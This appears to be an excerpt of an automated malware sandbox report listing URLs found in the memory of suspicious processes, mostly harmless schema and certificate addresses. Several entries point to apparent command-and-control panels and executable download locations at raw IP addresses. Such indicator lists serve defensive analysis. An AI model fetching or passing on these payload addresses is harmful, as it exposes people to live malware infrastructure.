                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpY
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.php_
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phph
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpjavapath;C:
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phplfons
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phps
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phptoIt3
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpy
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Nework.exeX
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Nework.exep
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/ferences.SourceAumid
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/lfons
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/rage.Streams.DataWriter
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.116.215.195/12dsvc.exe
                                  Source: svchost015.exe, 00000020.00000002.3006538986.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                  Source: svchost.exe, 0000001A.00000002.3344988955.0000019DEAC00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                                  Source: svchost.exe, 0000001A.00000003.2874602060.0000019DEAB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
